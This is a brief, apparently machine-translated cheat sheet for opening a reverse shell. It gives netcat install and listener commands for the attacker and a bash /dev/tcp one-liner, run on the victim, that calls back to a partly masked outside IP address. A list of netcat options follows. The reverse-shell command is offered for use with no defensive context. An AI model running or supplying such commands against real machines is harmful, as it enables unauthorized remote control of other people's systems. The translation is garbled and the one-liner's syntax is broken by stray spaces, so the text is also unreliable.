Attack:
apt-get install netcat
nc -lvvp 80
Victim machine:
/ bin / bash -i> & /dev/tcp/139.xxx.18.xx/80 0> & 1
nc command added:
-g <Gateway>: Set the communication gateway router hops, provided up to 8;
-G <pointer number>: Set Source route point, a value which is a multiple of 4;
-h: online help;
-i <delay in seconds>: set the time interval in order to transfer the scanning information and communication ports;
-l: Use listening mode, monitoring the incoming data;
-n: ip address directly, without passing through the domain name server;
-o <output file>: specify the file name, the transmission of data to and from the word hexadecimal dump to save the file;
-p <communications port>: Set the communication port used by the local host;
-r: source port and destination port random selection;
-s <Source address>: Set the local host IP address of the packet sent;
-u: using UDP transport protocol;
-v: display process execution instruction;
-w <timeout seconds>: connection setup time to wait;
-z: 0 using an input / output mode, only the communication port during the scan.